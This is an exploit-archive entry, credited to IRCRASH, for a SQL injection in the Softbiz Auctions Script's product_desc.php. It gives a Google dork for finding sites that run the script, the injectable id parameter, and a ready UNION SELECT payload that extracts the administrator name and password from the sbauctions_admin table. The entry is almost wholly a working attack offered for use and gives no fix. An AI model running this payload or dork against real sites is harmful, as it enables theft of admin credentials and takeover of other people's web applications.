id: 2277
date: 11/11/2007
title: Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln
author: IRCRASH
cves: 

==================================================================
Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln
==================================================================



#####################################################################################
####                    Softbiz Auctions Script Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#Google Dork : "Starting bid" "Powered by SoftbizScripts"                           #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://sitename/product_desc.php?id=<SQL C0de>                  #
#                                                                                   #
#SQL C0de : 999999%20union/**/select/**/0,1,admin_name,3,4,5,6,7,8,9,10,pwd,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/sbauctions_admin/*
#                                                                                   #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################



#  0day.today [2023-03-23]  #